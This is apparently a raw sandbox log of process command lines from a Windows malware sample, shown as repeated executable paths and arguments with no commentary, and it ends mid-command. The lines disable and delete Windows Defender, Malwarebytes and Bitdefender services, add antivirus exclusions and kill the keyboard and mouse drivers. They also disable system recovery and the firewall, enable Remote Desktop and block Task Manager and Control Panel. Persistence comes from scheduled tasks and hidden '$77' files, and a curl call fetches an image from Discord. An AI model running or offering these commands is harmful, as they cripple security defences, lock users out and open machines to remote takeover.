C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"

C:\Windows\system32\openfiles.exe

openfiles

C:\Windows\system32\openfiles.exe

openfiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "(new-object -com shell.application).minimizeall()"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "(new-object -com shell.application).minimizeall()"

C:\Windows\system32\curl.exe

curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png

C:\Windows\system32\curl.exe

curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\schtasks.exe

schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc config WinDefend start=disabled

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f

C:\Windows\system32\cmd.exe

cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"

C:\Windows\system32\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\system32\netsh.exe

netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f

C:\Windows\system32\schtasks.exe

schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f

C:\Windows\system32\ReAgentc.exe

reagentc /disable

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc config WinDefend start=disabled

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\Recovery /a /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\bcdedit.exe

bcdedit /set {current} recoveryenabled No

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue {default} recoveryenabled

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f

C:\Windows\system32\net.exe

net stop "SDRSVC"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC"

C:\Windows\system32\cmd.exe

cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"

C:\Windows\system32\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C:\Windows\system32\net.exe

net stop "WinDefend"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WinDefend"

C:\Windows\system32\taskkill.exe

taskkill /f /t /im "MSASCui.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"

C:\Windows\system32\net.exe

net stop "security center"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "security center"

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode-disable

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f

C:\Windows\System32\attrib.exe

"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\System32\attrib.exe

"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f

C:\Windows\system32\ReAgentc.exe

reagentc /disable

C:\Windows\system32\net.exe

net stop "wuauserv"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wuauserv"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y

C:\Windows\system32\net.exe

net stop "Windows Defender Service"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "Windows Defender Service"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\Recovery /a /r /d y

C:\Windows\system32\net.exe

net stop "Windows Firewall"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "Windows Firewall"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q

C:\Windows\system32\net.exe

net stop sharedaccess

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sharedaccess

C:\Windows\system32\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc config WinDefend start= disabled

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableAntiTamper $true"

C:\Windows\system32\bcdedit.exe

bcdedit /set {current} recoveryenabled No

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue {default} recoveryenabled

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\net.exe

net stop "SDRSVC"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC"

C:\Windows\system32\net.exe

net stop "WinDefend"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WinDefend"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"

C:\Windows\system32\taskkill.exe

taskkill /f /t /im "MSASCui.exe"

C:\Windows\system32\net.exe

net stop "security center"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "security center"

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode-disable

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y

C:\Windows\system32\taskkill.exe

taskkill /F /IM mbam.exe /T

C:\Windows\system32\net.exe

net stop "wuauserv"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wuauserv"

C:\Windows\system32\net.exe

net stop "Windows Defender Service"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "Windows Defender Service"

C:\Windows\system32\taskkill.exe

taskkill /F /IM MBAMService.exe /T

C:\Windows\system32\net.exe

net stop "Windows Firewall"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "Windows Firewall"

C:\Windows\system32\taskkill.exe

taskkill /F /IM mbamtray.exe /T

C:\Windows\system32\net.exe

net stop sharedaccess

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sharedaccess

C:\Windows\system32\taskkill.exe

taskkill /F /IM mbamscheduler.exe /T

C:\Windows\system32\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\sc.exe

sc stop MBAMService

C:\Windows\system32\reg.exe

REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\sc.exe

sc delete MBAMService

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc stop MBAMProtector

C:\Windows\system32\sc.exe

sc config WinDefend start= disabled

C:\Windows\system32\sc.exe

sc delete MBAMProtector

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableAntiTamper $true"

C:\Windows\system32\sc.exe

sc stop MBAMChameleon

C:\Windows\system32\sc.exe

sc delete MBAMChameleon

C:\Windows\system32\sc.exe

sc stop MBAMFarflt

C:\Windows\system32\sc.exe

sc delete MBAMFarflt

C:\Windows\system32\sc.exe

sc stop MBAMSwissArmy

C:\Windows\system32\sc.exe

sc delete MBAMSwissArmy

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdservicehost.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdagent.exe /T

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdredline.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdparentalservice.exe /T

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdreinit.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdsubwiz.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM seccenter.exe /T

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vsserv.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM epssecurityservice.exe /T

C:\Windows\system32\sc.exe

sc stop bdservicehost

C:\Windows\system32\sc.exe

sc delete bdservicehost

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y

C:\Windows\system32\sc.exe

sc stop bdagent

C:\Windows\system32\sc.exe

sc delete bdagent

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y

C:\Windows\system32\sc.exe

sc stop bdredline

C:\Windows\system32\taskkill.exe

taskkill /F /IM mbam.exe /T

C:\Windows\system32\sc.exe

sc delete bdredline

C:\Windows\system32\sc.exe

sc stop bdparentalservice

C:\Windows\system32\sc.exe

sc delete bdparentalservice

C:\Windows\system32\sc.exe

sc stop bdreinit

C:\Windows\system32\sc.exe

sc delete bdreinit

C:\Windows\system32\taskkill.exe

taskkill /F /IM MBAMService.exe /T

C:\Windows\system32\sc.exe

sc stop bdsubwiz

C:\Windows\system32\sc.exe

sc delete bdsubwiz

C:\Windows\system32\sc.exe

sc stop seccenter

C:\Windows\system32\sc.exe

sc delete seccenter

C:\Windows\system32\taskkill.exe

taskkill /F /IM mbamtray.exe /T

C:\Windows\system32\sc.exe

sc stop vsserv

C:\Windows\system32\sc.exe

sc delete vsserv

C:\Windows\system32\sc.exe

sc stop epssecurityservice

C:\Windows\system32\sc.exe

sc delete epssecurityservice

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM mbamscheduler.exe /T

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f

C:\Windows\system32\sc.exe

sc stop MBAMService

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f

C:\Windows\system32\sc.exe

sc delete MBAMService

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f

C:\Windows\system32\sc.exe

sc stop MBAMProtector

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\sc.exe

sc delete MBAMProtector

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\sc.exe

sc stop MBAMChameleon

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f

C:\Windows\system32\sc.exe

sc delete MBAMChameleon

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f

C:\Windows\system32\sc.exe

sc stop MBAMFarflt

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc delete WinDefend

C:\Windows\system32\sc.exe

sc delete MBAMFarflt

C:\Windows\system32\sc.exe

sc stop SecurityHealthService

C:\Windows\system32\sc.exe

sc stop MBAMSwissArmy

C:\Windows\system32\sc.exe

sc delete SecurityHealthService

C:\Windows\system32\sc.exe

sc delete MBAMSwissArmy

C:\Windows\system32\sc.exe

sc stop Sense

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f

C:\Windows\system32\sc.exe

sc delete Sense

C:\Windows\system32\taskkill.exe

taskkill /F /IM MsMpEng.exe /T

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM MpCmdRun.exe /T

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdservicehost.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM SecurityHealthSystray.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdagent.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM smartscreen.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdredline.exe /T

C:\Windows\system32\takeown.exe

takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdparentalservice.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdreinit.exe /T

C:\Windows\system32\takeown.exe

takeown /f "C:\Program Files\Windows Defender" /r /d y

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdsubwiz.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM seccenter.exe /T

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM vsserv.exe /T

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\notepad.exe /a /r /d y

C:\Windows\system32\icacls.exe

